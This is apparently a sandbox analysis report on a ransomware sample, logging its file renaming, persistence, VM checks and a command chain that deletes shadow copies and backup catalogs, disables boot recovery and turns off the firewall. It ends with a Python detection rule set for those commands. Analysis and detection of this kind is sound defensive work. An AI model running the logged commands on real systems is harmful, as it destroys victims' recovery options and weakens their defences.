Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-SignCrossSellCard-modals-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-signsettings-popups-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-split-popups-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-unifiedShare-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-verbs-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-videoplayer-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: Fast.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: vk_swiftshader.dll.pdb | source: vk_swiftshader.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight.0.dr
Source: Fast.exe | Static PE information: section name: .cdata
Source: Fast.exe.0.dr | Static PE information: section name: .cdata
Source: Fast.exe.2.dr | Static PE information: section name: .cdata
Source: Fast.exe0.2.dr | Static PE information: section name: .cdata

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Common Files\microsoft shared\ink\mraut.dll
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Windows Defender Advanced Threat Protection\Classification\SenseCE.exe
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Common Files\microsoft shared\ink\micaut.dll
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Windows Defender Advanced Threat Protection\SenseNdr.exe
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Windows Photo Viewer\PhotoViewer.dll
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\System.ServiceModel.dll
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Common Files\microsoft shared\ink\InkObj.dll
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Windows NT\Accessories\wordpad.exe
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\System.Data.Entity.dll
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Windows Defender\MpSvc.dll
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\PresentationFramework.dll
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Windows Defender\NisSrv.exe
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\PresentationCore.dll
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Windows Defender Advanced Threat Protection\Classification\OPCTextExtractorWin.dll
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Windows Defender Advanced Threat Protection\Classification\nl7data0804.dll
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.dll
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Common Files\microsoft shared\ink\tabskb.dll
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Windows Media Player\setup_wm.exe
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Windows Photo Viewer\ImagingEngine.dll
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Windows Photo Viewer\PhotoAcq.dll
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Windows Defender Advanced Threat Protection\Classification\nl7data0404.dll
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Common Files\microsoft shared\ClickToRun\msix.dll
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Windows Defender Advanced Threat Protection\Classification\nl7data0011.dll
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files (x86)\common files\Microsoft Shared\ink\mraut.dll
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Common Files\microsoft shared\ClickToRun\RepoMan.dll
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Windows Defender Advanced Threat Protection\SenseCM.exe
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVIntegration.dll
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Windows Defender Advanced Threat Protection\Classification\mce.dll
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
Source: C:\Users\user\Desktop\Fast.exe | File created: C:\Users\user\AppData\Local\Fast.exe
Source: C:\Users\user\Desktop\Fast.exe | File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Fast.exe
Source: C:\Users\user\Desktop\Fast.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exe

Boot Survival

Source: C:\Users\user\Desktop\Fast.exe | File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Fast.exe
Source: C:\Users\user\Desktop\Fast.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exe
Source: C:\Users\user\Desktop\Fast.exe | File created: c:\programdata\microsoft\windows\start menu\programs\startup\Fast.exe
Source: C:\Users\user\Desktop\Fast.exe | File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Fast.exe\:Zone.Identifier:$DATA
Source: C:\Users\user\Desktop\Fast.exe | File created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\Fast.exe
Source: C:\Users\user\Desktop\Fast.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exe\:Zone.Identifier:$DATA
Source: C:\Users\user\Desktop\Fast.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Fast
Source: C:\Users\user\Desktop\Fast.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Fast

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\Fast.exe | File created: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1001\desktop.ini.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Windows\System32\wbengine.exe | File created: C:\System Volume Information\WindowsImageBackup
Source: C:\Windows\System32\netsh.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\vds.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Users\user\AppData\Local\Fast.exeEvasive API call chain: GetLocaleInfo, EnterCriticalSection, DeleteCriticalSectiongraph_14-3665
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exeEvasive API call chain: GetLocaleInfo, EnterCriticalSection, DeleteCriticalSection
Source: C:\Windows\System32\vds.exeFile opened / queried: scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\Fast.exeWindow / User API: threadDelayed 6924Jump to behavior
Source: C:\Users\user\Desktop\Fast.exeWindow / User API: threadDelayed 2440Jump to behavior
Source: C:\Users\user\Desktop\Fast.exeWindow / User API: threadDelayed 2217Jump to behavior
Source: C:\Users\user\Desktop\Fast.exeWindow / User API: threadDelayed 7769Jump to behavior
Source: C:\Users\user\AppData\Local\Fast.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_14-4875
Source: C:\Users\user\Desktop\Fast.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_2-4729
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Users\user\AppData\Local\Fast.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_14-3856
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\Fast.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_2-3898
Source: C:\Users\user\AppData\Local\Fast.exeAPI coverage: 4.6 %
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exeAPI coverage: 4.6 %
Source: C:\Users\user\Desktop\Fast.exe TID: 7804Thread sleep count: 6924 > 30Jump to behavior
Source: C:\Users\user\Desktop\Fast.exe TID: 7804Thread sleep time: -6924000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Fast.exe TID: 7792Thread sleep count: 64 > 30Jump to behavior
Source: C:\Users\user\Desktop\Fast.exe TID: 7792Thread sleep time: -64000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Fast.exe TID: 7804Thread sleep count: 2440 > 30Jump to behavior
Source: C:\Users\user\Desktop\Fast.exe TID: 7804Thread sleep time: -2440000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Fast.exe TID: 7680Thread sleep count: 2217 > 30Jump to behavior
Source: C:\Users\user\Desktop\Fast.exe TID: 7680Thread sleep time: -2217000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Fast.exe TID: 7680Thread sleep count: 7769 > 30Jump to behavior
Source: C:\Users\user\Desktop\Fast.exe TID: 7680Thread sleep time: -7769000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Fast.exeCode function: 2_2_00CA5D61 FindFirstFileW,FindNextFileW,FindClose,2_2_00CA5D61
Source: C:\Users\user\AppData\Local\Fast.exeCode function: 14_2_000D5D61 FindFirstFileW,FindNextFileW,FindClose,14_2_000D5D61
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exeCode function: 25_2_00205D61 FindFirstFileW,FindNextFileW,FindClose,25_2_00205D61
Source: Fast.exe, 00000000.00000003.1903574983.00000000046A0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\D:\sources\replacementmanifests\microsoft-hyper-v-client-migration-replacement.man{
Source: vds.exe, 00000018.00000002.4238010107.0000023C61818000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}J
Source: vds.exe, 00000018.00000002.4238010107.0000023C61837000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000*
Source: vds.exe, 00000018.00000002.4238010107.0000023C61837000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000d
Source: vds.exe, 00000018.00000003.2225368840.0000023C61868000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: vds.exe, 00000018.00000003.2246230697.0000023C6187A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: Fast.exe, 00000000.00000003.1958071986.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1976169149.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1906110205.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1943437772.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1946726629.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1913579887.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1889453212.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1894613013.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1900256697.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1903742664.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\D:\sources\replacementmanifests\microsoft-hyper-v-client-migration-replacement.man
Source: Fast.exe, 00000000.00000003.1903574983.00000000046A0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\D:\sources\replacementmanifests\microsoft-hyper-v-drivers-migration-replacement.man-
Source: bcdedit.exe, 00000012.00000002.2132924831.00000232A8F58000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: I VMware Virtual SATA CDROM Drive (0.0)
Source: Fast.exe, 00000000.00000003.1903742664.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\D:\sources\replacementmanifests\microsoft-hyper-v-migration-replacement.mans
Source: vds.exe, 00000018.00000003.2225368840.0000023C61868000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56KKqi
Source: vds.exe, 00000018.00000002.4238010107.0000023C61818000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}.dll
Source: Fast.exe, 00000000.00000003.1903574983.00000000046A0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\D:\sources\replacementmanifests\microsoft-hyper-v-drivers-migration-replacement.man9
Source: vds.exe, 00000018.00000002.4238010107.0000023C61818000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: Fast.exe, 00000000.00000003.1903574983.00000000046A0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\D:\sources\replacementmanifests\microsoft-hyper-v-client-migration-replacement.manL
Source: bcdedit.exe, 00000014.00000002.2173147665.000001BB4003B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: pEFI VMware Virtual SATA CDROM Drive (0.0)
Source: vds.exe, 00000018.00000002.4238010107.0000023C61837000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: vds.exe, 00000018.00000003.2251773165.0000023C6187A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}Ph
Source: vds.exe, 00000018.00000002.4238010107.0000023C6185A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000*
Source: vds.exe, 00000018.00000003.2242855321.0000023C6187A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: vds.exe, 00000018.00000003.2225368840.0000023C61868000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Fast.exe, 00000000.00000003.1958071986.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1976169149.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1906110205.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1943437772.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1946726629.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1913579887.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1889453212.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1894613013.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1900256697.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1903742664.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\D:\sources\replacementmanifests\microsoft-hyper-v-migration-replacement.man
Source: vds.exe, 00000018.00000003.2229123796.0000023C61868000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: age#volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\storage#volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000c5e500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\storage#volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: vds.exe, 00000018.00000002.4238010107.0000023C61837000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: NECVMWar VMware SATA CD00
Source: vds.exe, 00000018.00000002.4238010107.0000023C61837000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Fast.exe, 00000000.00000003.1903574983.00000000046A0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\D:\sources\replacementmanifests\microsoft-hyper-v-drivers-migration-replacement.man
Source: vds.exe, 00000018.00000003.2246860462.0000023C6187E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: #cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Fast.exe, 00000000.00000003.1958071986.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1976169149.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1906110205.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1943437772.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1946726629.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1913579887.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1889453212.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1894613013.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1900256697.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.1903742664.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\D:\sources\replacementmanifests\microsoft-hyper-v-drivers-migration-replacement.man
Source: Fast.exe, 00000000.00000003.1903742664.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\D:\sources\replacementmanifests\microsoft-hyper-v-migration-replacement.man
Source: Fast.exe, 00000000.00000003.1903574983.00000000046A0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\D:\sources\replacementmanifests\microsoft-hyper-v-drivers-migration-replacement.manb
Source: vds.exe, 00000018.00000003.2242192548.0000023C6187F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: vds.exe, 00000018.00000002.4238010107.0000023C6185A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000Ph
Source: vds.exe, 00000018.00000003.2246726317.0000023C61887000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: vds.exe, 00000018.00000002.4238010107.0000023C6185A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: vds.exe, 00000018.00000002.4238010107.0000023C6185A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: vds.exe, 00000018.00000003.2233616626.0000023C61868000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: age#volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{7f108a28-9833-4b3b-b780-2c6b5fa5c062}\?\storage#volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000c5e500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\storage#volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\Fast.exe | API call chain: ExitProcess graph end node | graph_2-3699
Source: C:\Users\user\Desktop\Fast.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Fast.exe | Code function: 2_2_00CA90A1 GetProcessHeap,RtlFreeHeap
Source: C:\Users\user\Desktop\Fast.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\Fast.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
Source: C:\Users\user\Desktop\Fast.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbadmin.exe wbadmin delete catalog -quiet
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh advfirewall set currentprofile state off
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh firewall set opmode mode=disable
Source: C:\Users\user\Desktop\Fast.exe | Code function: 2_2_00CA4428 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,LookupAccountSidW,GetLastError,FreeSid
Source: C:\Users\user\Desktop\Fast.exe | Code function: 2_2_00CA29F5 GetTickCount,GetLocaleInfoW,Sleep,Sleep,Sleep,CreateThread,WaitForSingleObject,EnterCriticalSection,LeaveCriticalSection,WaitForMultipleObjects,CloseHandle,EnterCriticalSection,CloseHandle,CloseHandle,DeleteCriticalSection,ReleaseMutex,CloseHandle
Source: C:\Users\user\AppData\Local\Fast.exe | Code function: 14_2_000D29F5 GetTickCount,GetLocaleInfoW,Sleep,Sleep,Sleep,CreateThread,WaitForSingleObject,EnterCriticalSection,LeaveCriticalSection,WaitForMultipleObjects,CloseHandle,EnterCriticalSection,CloseHandle,CloseHandle,DeleteCriticalSection,ReleaseMutex,CloseHandle
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exe | Code function: 25_2_002029F5 GetTickCount,GetLocaleInfoW,Sleep,Sleep,Sleep,CreateThread,WaitForSingleObject,EnterCriticalSection,LeaveCriticalSection,WaitForMultipleObjects,CloseHandle,EnterCriticalSection,CloseHandle,CloseHandle,DeleteCriticalSection,ReleaseMutex,CloseHandle
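The seven commands spawned from cmd.exe above are the sample's recovery-inhibition and firewall-disable chain (shadow copies deleted twice, boot recovery switched off, the Windows Backup catalog deleted, the firewall disabled via both the legacy and the advfirewall interface). The following is an added detection example written for this report; it is not Joe Sandbox code and not part of the original page. It runs over constructed process-creation records whose command lines are copied from the lines above plus one constructed benign control ("vssadmin list shadows"); the ProcEvent field names, the rule names and the min_distinct_rules threshold are this example's own choices, while the MITRE technique IDs (T1490 Inhibit System Recovery, T1562.004 Disable or Modify System Firewall) are the standard ones for these behaviours.

```python
"""Detect the ransomware recovery-inhibition command chain seen in the report.

Added example, not Joe Sandbox code. Event schema, rule names and sample events
are constructed for this example.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1 / EDR style fields)."""
    parent_image: str
    image: str
    command_line: str


# (rule name, regex applied to the lower-cased command line, MITRE technique)
RULES = (
    ("vssadmin_delete_shadows",
     r"\bvssadmin(?:\.exe)?\b.*\bdelete\b.*\bshadows\b", "T1490"),
    ("wmic_shadowcopy_delete",
     r"\bwmic(?:\.exe)?\b.*\bshadowcopy\b.*\bdelete\b", "T1490"),
    ("bcdedit_ignore_boot_failures",
     r"\bbcdedit(?:\.exe)?\b.*\bbootstatuspolicy\b.*\bignoreallfailures\b", "T1490"),
    ("bcdedit_disable_recovery",
     r"\bbcdedit(?:\.exe)?\b.*\brecoveryenabled\b.*\bno\b", "T1490"),
    ("wbadmin_delete_catalog",
     r"\bwbadmin(?:\.exe)?\b.*\bdelete\b.*\bcatalog\b", "T1490"),
    ("netsh_firewall_off",
     r"\bnetsh(?:\.exe)?\b.*(?:\badvfirewall\b.*\bstate\s+off\b"
     r"|\bfirewall\b.*\bopmode\b.*\bdisable\b)", "T1562.004"),
)

# Locations a non-admin user can write to; Fast.exe runs from the Desktop here.
USER_WRITABLE = re.compile(r"^[a-z]:\\(?:users|programdata|temp|windows\\temp)\\", re.I)


def match_rules(event):
    """Return [(rule_name, technique), ...] for every rule the command line matches."""
    cl = event.command_line.lower()
    return [(name, tech) for name, pattern, tech in RULES if re.search(pattern, cl)]


def parent_is_user_writable(event):
    """True when the parent binary lives in a user-writable path (cmd.exe launched by Fast.exe)."""
    return bool(USER_WRITABLE.match(event.parent_image))


def assess(events, min_distinct_rules=2):
    """Correlate hits across a host's events and return (verdict, {rule_name: [events]}).

    A lone 'vssadmin delete shadows' can be legitimate admin work; the report shows six
    distinct inhibition commands from one cmd.exe chain, and that combination is what the
    verdict keys on. Matching per event, correlating per host, keeps the false-positive
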